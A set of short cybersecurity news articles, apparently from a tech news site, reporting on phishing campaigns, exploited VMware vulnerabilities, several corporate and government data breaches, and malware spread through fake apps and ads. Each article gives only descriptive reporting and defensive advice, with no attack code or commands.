• Fraudsters are impersonating US Government agencies
• Victims are encouraged to renew fake contracts using DocuSign
• Attacks have spiked almost 100% in the last month

Cybersecurity researchers have found threat actors are increasingly using DocuSign impersonations to target businesses who interact with state and municipal agencies.

Research by SlashNext found attacks have spiked 98% compared to the previous two months, with hundreds of instances are being detected daily, and tactics are outpacing detection methods. Many of these are specifically impersonating government entities to exploit pre-existing trusted relationships between businesses and regulatory bodies.

Researchers found impersonations of the Department of Health and Human Services, the Maryland Department of Transportation, the State of North Carolina’s Electronic Vendor portal, the City of Milwaukee, the City of Charlotte, the City of Houston, and the North Carolina Licensing Board for General Contractors.

High stakes signatures

As with most scams, the criminals created a false sense of urgency in victims. In one instance, a North Carolina Commercial contractor received a notice that their $12 million hospital construction project was at risk of immediate shutdown due to a compliance issue. The notice demanded an $85,000 ‘emergency compliance bond’ to prevent work stoppage.

As well as the financial loss, vendors face business disruption and sensitive data loss from the false contracts.

Businesses that hold a number of government contracts may be inundated with communications and contracts, but it’s important to stay vigilant and double check emails with inaccurate pricing or industry specific terminology as an indicator of inauthenticity.

“For businesses, the most important approach to defend against these fraudulent attacks is to spread awareness within the organization, to upskill and empower all workers to identify attacks at the earliest possible stage.” said Matt Aldridge, Principal Solutions Consultant at OpenText Cybersecurity.

“Beyond this, it is critical that inbound communications are thoroughly screened before being presented to users, be they emails, SMS, or even old school postal and fax communications”

You might also like

• Take a look at our pick of the endpoint protection software
• Fake AI video generators are being used to hack Windows and macOS devices
• Check out our choices for best antivirus software

• A VMware bug that grants Remote Code Execution abilities is being exploited in the wild
• The bug was first spotted in September 2024, but the patch did not solve the problem
• A second patch was released, and users are urged to apply now

Broadcom is warning two vulnerabilities plaguing its VMware vCenter Server product are being exploited in the wild by hackers.

Patches are available, and users are urged to apply them immediately, since there is no workaround. Furthermore, the vulnerabilities can be used to cause quite the damage to compromised networks.

In mid-September 2024, VMware released a security advisory, claiming to have patched two flaws in vCenter Server that could have granted threat actors remote code execution (RCE) abilities.

Confirmed exploitation

These flaws were tracked as CVE-2024-38812 and CVE-2024-38813.

The former affects vCenter 7.0.3, 8.9.2, and 8.0.3, as well as all versions of vSphere or VMware Cloud Foundation prior to the ones listed above. It was given a severity score of 9.8 (critical) since it can be exploited without user interaction, and since it grants RCE capabilities to a threat actor sending a custom-built network packet. The latter, on the other hand, is a 7.5-severity flaw, granting root privilege escalation.

Both vulnerabilities were first discovered by Team TZL at Tsinghua University, during the Matrix Cup Cyber Security Competition, held in China earlier this year.

However, it was soon announced that the patches did not properly work, since Broadcom issued a second patch in late October 2024. At that time, despite the bug being present for months, and having been patched twice, there was still no evidence of abuse in the wild.

However, that time has now come.

"Updated advisory to note that VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813," Broadcom said earlier this week.

Unfortunately, at this time, we don’t know who is abusing these vulnerabilities, or against whom. However, BleepingComputer reminds that threat actors, including ransomware gangs and state-sponsored threat actors, often target VMware vCenter bugs.

Via BleepingComputer

You might also like

• VMware vCenter Server RCE vulnerability patched by Broadcom
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Emails from the US Library of Congress reportedly compromised
• Attack was likely carried out by a foreign actor, experts claim
• US Government institutions are increasingly under attack

Email correspondence to and from staff at the US Library of Congress’ Congressional Research Service have been compromised by a ‘foreign adversary’ in an elaborate hack, reports have claimed.

From January to September 2024, foreign actors have been able to access emails between congressional legislative staff and researchers, according to NBC News.

It's not yet known exactly how many or which emails were accessed by the hackers, but Congress staff are concerned given the sensitive nature of communications between legislative staff and researchers.

Sensitive information

The Library of Congress is a research library that serves and has dedicated research staff to Congress, responding to over 76,000 inquiries in 2023. The staff offer policy and legal analysis to congressional committees, making it an invaluable resource.

Because of the nature of the library’s work, it's likely that hackers had access to preliminary legislative proposals, or got unauthorized access to staffer’s opinions and ideas. Reports have confirmed that the US Copyright Office was not impacted.

The attack is said to have been carried out by a ‘foreign adversary’, although it’s not clear which nation actor was behind the breach as of yet. Cyberattacks from the ‘Big Four’ (Iran, Russia, China, and the DPRK) have all increased dramatically in the run up to the election, so investigators will likely be looking in these directions.

As of yet, the origin of the breach is unknown, but staff have been reminded of the phishing and email security guidance, suggesting this may have been the point of origin.

This isn’t the first time in recent months Congressional staff have had their data compromised, as in September 2024, it was revealed almost 3,200 US politicians and staff had their data leaked to the dark web, meaning nearly 20% of people working in Congress were exposed.

You might also like

• Take a look at our pick of the best malware removal software
• Top US Cybersecurity Agency chief set to depart before Trump takes over
• Check out our choices for endpoint protection software around

• Maxar notifies California Attorney General of data breach
• It says sensitive employee data was stolen in the attack
• The attacker used a Hong Kong address to breach the systems

Maxar Space Systems has reported suffering a data breach in which it lost sensitive employee data.

Confirming the breach in a filing with the California Attorney General, as well as in a breach notification letter sent to affected individuals, the company revealed an unidentified threat actor accessed its systems early in October 2024.

The hacker, who allegedly used a Hong Kong-based IP address for the intrusion, lurked for a week, exfiltrating sensitive data, before being spotted on October 11, and quickly ousted.

Hidden Risk

Before being expelled, the crooks managed to steal sensitive information on a yet undisclosed number of Maxar employees, including people’s names, postal addresses, Social Security Number (SSN), business contact information (business phone, location, business email, and other data), gender, employment status, employee number, job title, hire date, role start date, and in some cases - termination date, supervisor, and department information.

This is more than enough information to run all kinds of cyberattacks, from phishing, to identity theft, and possibly even ransomware and wire fraud. Luckily, bank account information and birth dates were not exposed.

Maxar said it notified the police, and offered both current and former employees a year’s worth of identity theft protection and credit monitoring via IDShield and IDX. “We strongly encourage you to report incidents of suspected identity theft to law enforcement,” the company added.

The affected company is a division of Maxar Technologies, specializing in the design, manufacturing, and integration of advanced satellite systems and space-based solutions for commercial and governmental applications.

It has roughly 2,600 employees, with more than half having US security clearances, meaning they can work on US government contracts.

Maxar Technologies, on the other hand, is a major space technology and intelligence company that provides geospatial data, satellite imagery, and advanced analytics to support industries such as defense, intelligence, and commercial sectors. This sector was not breached.

Via TechCrunch

You might also like

• North Korean hackers are targeting Apple users with new macOS malware
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• A known hacker posts a new thread on an underground forum, offering Ford data for free
• Ford responds by saying it is investigating the claims
• There is no confirmation of data's authenticity yet

Ford says it is looking into a potential data breach after internal company information ended up on the dark web.

A known leaker with the alias EnergyWeaponUser recently posted a new thread on BreachForums, offering Ford’s data for free. “Today, I have uploaded the Ford Motor Company internal database for you to download, thanks for reading and enjoy!,” the post reads. EnergyWeaponUser added that the company was breached together with IntelBroker, another infamous leakster.

“In November 2024, Ford Motor Company, an American multinational automobile company suffered a data breach,” the post further adds. “It exposes 44k records of customer names, physical locations, bought product.”

"Actively investigating"

The crooks also shared a small sample of the stolen data, which appears to include customer names, postal addresses, country codes, customer type codes, city information, sales types, account codes, last update timestamps, and other records.

After the thread surfaced, The Register reached out to the company, which confirmed looking into the allegations of data theft.

"Ford is aware and is actively investigating the allegations that there has been a breach of Ford data," spokesperson Richard Binhammer told the publication. "Our investigation is active and ongoing."

EnergyWeaponUser and IntelBroker are quite active in the underground hacking community, often posting archives from breached corporations. As such, they have seen leaking Cisco information, and sensitive data from AMD, in the past. IntelBroker was also seen leaking Europol, Nokia, and others.

Whether or not Ford’s data is authentic, remains to be seen. Losing sensitive customer data can result in all kinds of headaches for the company, from regulatory fines, to class action lawsuits. Most of the time, however, the biggest expense is paying for identity theft protection and credit monitoring services, which most companies provide to affected individuals, for up to two years.

Via The Register

You might also like

• Major security flaws found in Mercedes, Ferrari and other top luxury cars
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Security researchers spotted phishing emails with SVG attachments
• The nature of SVG files allows them to bypass email protections
• Common sense remains the best way to defend against phishing

Hackers are always looking for new ways to sneak phishing emails into people’s inboxes, and it seems SVG attachments are the next big thing.

Security researchers recently posted about SVG attachments on Twitter, claiming their nature allows them to bypass email protections and land malicious content in victim's inbox.

For the uninitiated, SVG is short for Scalable Vector Graphics - it’s a lossless image format used all across the web, especially for content that is designed to be viewed on screens of different sizes. Images are not created with pixels, but rather with XML-based code which defines graphics. Since images are built with code, they cannot be analyzed by antivirus programs in the traditional sense of the word. As a result, many bypass current protections.

Fake Excel

According to MalwareHunterTeam, some cybercriminals found a way to abuse this fact. One of the examples was creating a fake Excel spreadsheet with SVG which allows people to submit different content (mostly login credentials and other valuable information).

Even if email security solutions providers find a way to defend against SVG-borne email attacks, crooks will only find another attack avenue.

Therefore, relying exclusively on software to protect your inbox against these threats is super risky. Instead, experts suggest humans be put in the proverbial trenches - using common sense, spotting phishing emails, and acting accordingly (reporting and deleting the email immediately) remains the best form of defense.

Another way crooks can bypass email protection in phishing attacks is through the use of QR codes.

Since these come in .JPG or similar image formats, they rarely get scanned for malice. Furthermore, QR codes in emails usually force victims to bring up their mobile devices, which are rarely as secure as desktop devices, increasing the chances of infection or data loss.

Via BleepingComputer

You might also like

• Phishing attacks surge in 2024 as cybercriminals adopt AI tools and multi-channel tactics
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Malicious commits found in Exo Labs' GitHub account
• They were submitted, and pointed to, a Texas-based security researcher
• The malware does not exist, and the researcher claims someone is impersonating him

Someone has been breaking into GitHub projects, injecting malicious code, and seemingly trying to discredit a researcher by accusing them of the hack.

Executives from AI and machine learning startup Exo Labs have warned someone tried to submit new changes to the code in the company’s GitHub repository.

The added code was “innocent looking”, and was titled “clarify mlx requirement for deepseek models”, and in order to hide the code from scrutiny, the attacker converted it to a number equivalent. However, the submission was analyzed before being pushed to the repository, and it was quickly discovered that it tried to connect to the evildojo[dot]com, to download the stage one payload. The researchers determined that there was no payload on the server and that it simply returned a 404 error.

Hidden Risk

Drilling deeper into the attack, the researchers discovered that the evildojo domain, as well as the GitHub accounts associated with the attack, all pointed to a researcher named Mike Bell - a security researcher and a white-hat hacker from Texas. He denies any involvement with the attack and claims it was all an attempt to ruin his good name.

"Not me, an impersonator. Notice account deleted. Very sorry people are being dragged into some skid's beef w/ me," BleepingComputer cited Bell saying about the attacks. “There was never any payload...why do people keep assuming there was?,” he added.

When questioned about the incident on X, Bell clarified that whoever was behind the attack never got access to his domain, never got the payload on his site, and that all Bell did was “piss someone off, apparently.”

Given that anyone can create a GitHub account impersonating someone else, and since there was no malicious payload or harm caused, the idea of a smear campaign seems plausible—especially since Bell is actively involved in the cybersecurity community, albeit from the opposing side.

Via BleepingComputer

You might also like

• North Korean hackers are targeting Apple users with new macOS malware
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Jen Easterly will vacate her post as Director of CISA before Trump comes into office
• The future of CISA is uncertain under Trump, who has criticized the department in the past
• There's no news yet on Easterly's successor

The Director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, is set to vacate her post before President Trump returns to office on January 20 2025, throwing the future of the agency into doubt.

CISA is responsible for critical infrastructure protection and improving the US government’s protections against cybercriminals and state actors, who are increasingly targeting American agencies in order to exfiltrate data and disrupt services.

Easterly held a number of security positions before taking the post as Director of CISA, such as senior director for counterterrorism on the National Security Council and Global Head of Cybersecurity for Morgan Stanley. Her departure leaves the fate of the agency uncertain.

Slash and burn

Given the number of eyebrow-raising proposed cabinet appointees by the Ppresident-elect, it's difficult to predict who might fill the position in 2025 and beyond.

CISA was created during Trump’s first term, but his consistent commitment to deregulation could limit the agency’s ability to enforce compliance with cybersecurity standards.

Following the narrow senate election win for the Republican party, senator Rand Paul is set to take over as chair of the Senate Homeland Security and Governmental Affairs committee, which will oversee CISA. Paul, a staunch libertarian and critic of CISA, previously accused the agency of infringing on free speech as part of its effort to counter digital disinformation.

Trump is likely to boost military spending in his second term, but most other agencies face seriously slashed budgets in the coming years. Although under the defense umbrella, cybersecurity will likely be amongst those to lose out on funding.

Governments across the globe are facing a dramatic surge in cyberattacks, with Government organizations seeing a 236% increase in malware attacks, so cybersecurity will be a key consideration for the foreseeable future.

Via NextGov

You might also like

• Take a look at our pick of the endpoint protection software
• Hackers are spreading QR code malware through...the post?
• Check out our choices for best malware removal software around

• Security researchers discover ad campaign for a piece of fake software
• Software was advertised as an AI-powered photo and video editor
• In reality, it was distributing the AMOS and Lumma Stealer malware

Hackers are hiding infostealers and other malware behind fake AI-powered photo and video editors, experts have claimed.

A cybersecurity researcher alias g0njxa found a socail media advertising campaign promoting the malware, posing as a fake editor called EditPro, and propped up an accompanying website editproai[dot]pro.

Then, they created deepfake videos of Presidents Trump and Biden enjoying ice cream together, and used them in ads posted on social media sites such as X. The fake editors were built for both Windows and macOS, but anyone who falls for the trick and downloads the program, will end up installing either Lumma Stealer or AMOS.

Lumma and AMOS

Lumma Stealer is a malware-as-a-service (MaaS) tool designed to steal sensitive information, including login credentials, cookies, browsing history, credit card data, and cryptocurrency wallet details.

The malware employs sophisticated techniques like process injection and encrypted communications with command-and-control servers, making it challenging to detect and mitigate. It has been active since 2022, with frequent updates enhancing its evasion and data theft strategies.

AMOS, short for Attack Management and Operations System, is a platform that enables threat actors to manage malware campaigns with minimal technical skills. It acts as a command-and-control (C2) system, and provides tools for deploying malware, managing infected systems, and exfiltrating stolen data.

It is typically used to coordinate large-scale attacks, automating many aspects of the cybercriminal workflow.

If you downloaded the fake EditPro software, assume that all of your passwords, and sensitive information stored on the device, are compromised. As such, make sure to first remove any traces of the malware from the computer, before updating all passwords and other sensitive data. Enable 2FA wherever possible, and move your cryptos and NFTs to a new wallet with a new seed phrase.

Via BleepingComputer

You might also like

• Lumma Stealer malware linked as project fixes in GitHub comments
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• 2021 Twitch breach exposed sensitive data on thousands of users
• An investigation by the Turkish data protection watchdog concluded the company was to blame
• Twitch has to pay $58,000

Türkiye has fined Amazon $58,000 for the Twitch data breach in 2021 which affected thousands of Turkish nationals.

An anonymous hacker leaked the entirety of popular video game live streaming service Twitch, including its source code and personally identifiable information (PII) of its users. The leaked data was rolled into a 125 GB torrent, and its link was posted to the popular 4chan imageboard.

Since the breach was said to have affected Turkish citizens, the country’s Personal Data Protection Board (KVKK) opened up an investigation soon after the attack. In total, 35,274 Turkish nationals were affected, so KVKK imposed a 1.75 million lira fine for inadequate security and 250,000 lira for failing to report the breach.

Lumma and AMOS

The results of the investigation showed that the company, which was acquired by Amazon back in 2014 for $970 million in cash, “failed to take adequate security measures beforehand, addressing the issue only afterward.” What’s more, KVKK concluded that the company’s risk and threat assessment were “insufficient.”

At press time, Twitch was not commenting on the incident, however it did, at the time, downplay the importance of the breach, saying the attackers didn’t get their hands on the login credentials of users, suggesting that the threat was somewhat limited.

“Twitch passwords have not been exposed. We are also confident that systems that store Twitch login credentials, which are hashed with bcrypt, were not accessed, nor were full credit card numbers or ACH / bank information,” Twitch said.

At the time, it was reported the hacker wasn’t pleased with the community that had built around the service. and leaked the data in a bid to “foster more disruption and competition in the online video streaming space.”

Soon afterward, Twitch confirmed the breach, saying its team was “working with urgency” to understand the extent of the incident.

Via Reuters

You might also like

• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now
• AnnieMac says thousands of customers have had data stolen in breach

• AnnieMac says more than 170,000 people have had names and SSNs exposed
• New filing with the Maine Attorney General covers Summer 2023 hack
• The identity and motive of the attackers are unknown at this time

AnnieMac Home Mortgage has revealed suffering a data breach in which the sensitive data on hundreds of thousands of customers was exposed.

The mortgage company confirmed the information in a filing with the Maine Office of the Attorney General, saying it spotted “suspicious activity on certain systems” within its network on August 23, 2023.

Subsequent investigation determined that an unnamed attacker accessed the company’s IT infrastructure on August 21, and “viewed and/or copied certain files” from these systems.

No one claimed responsibility yet

These “certain files” held people’s full names and Social Security Numbers (SSN). A total of 171,074 individuals were affected by the incident.

This, arguably, isn’t that disruptive of a breach. Cybercriminals prefer databases with email addresses, postal addresses, and phone numbers, since they can use the information to impersonate other people, engage in spam and phishing, and more. There are not plenty of things they can do with just names and SSNs.

To tackle the incident, AnnieMac did what most victim organizations do these days - it employed a third-party forensics company, notified the police, mailed the affected people, and offered a year’s worth of identity theft protection and credit monitoring, via CyEx.

It also apologized, saying the “confidentiality, privacy, and security of personal information within our care are among AnnieMac’s highest priorities.”

We don’t know who stole the files. So far, no one has claimed responsibility for the attack, and the files are yet to pop up anywhere on the dark web.

AnnieMac Home Mortgage is a full-service mortgage lender that provides a wide range of home financing solutions, such as conventional loans, FHA loans, VA loans, USDA loans, and jumbo loans. With hundreds of thousands of customers, the company generates an estimated annual revenue of approximately $240 million.

Via The Register

You might also like

• North Korean hackers are targeting Apple users with new macOS malware
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Swiss citizens warned about fake ‘Alertswiss app’
• Malicious app deploys a variant of the Coper trojan
• Keystrokes, 2FA codes and credentials are at risk

The Swiss National Cyber Security Centre (NCSC) is warning the public about a recent malware campaign targeting citizens via the country’s postal service.

Residents are reportedly receiving letters through the post from what they believe to be the Federal Office of Meteorology and Climatology, urging them to install a fraudulent weather app.

The letters include a QR code to facilitate with the download of the Android-based ‘Severe Weather Warning App,’ which masquerades as the nation’s Alertswiss app.

Swiss citizens targeted by QR code malware

Using QR codes to spread malware isn’t new, however attack vectors can vary widely. When accessing online content, users should always be cautious of telltale signs that suggest the content they’re accessing is not legitimate.

In this case, the malicious app is labelled ‘AlertSwiss,’ whereas the genuine app is labelled ‘Alertswiss.’ It also has a slightly different icon. Furthermore, the app is distributed via a third-party website, rather than Google’s own Play Store, which is another key red flag.

Upon installation, the app deploys a Coper trojan variant that logs keystrokes, intercepts two-factor authentication messages and steals banking credentials by targeting apps installed on the victim’s device. According to the public warning, it has access to more than 383 smartphone apps.

The app also communicates with command-and-control servers, and can present phishing screens to obtain sensitive information from the victims.

The NCSC said that this was the first time that malware had been delivered through physical mail in the country: “The letters look official with the correct logo of the Federal Office for Meteorology and thus trustworthy.”

Citizens targeted by the letter are being urged to report it to the NCSC. Those who have already downloaded the app should reset their phones to factory settings.

Via The Register

You might also like

• We’ve listed the best Android antivirus apps
• These are the best privacy apps for Android
• This devious new malware is going after macOS users with a whole barrel of tricks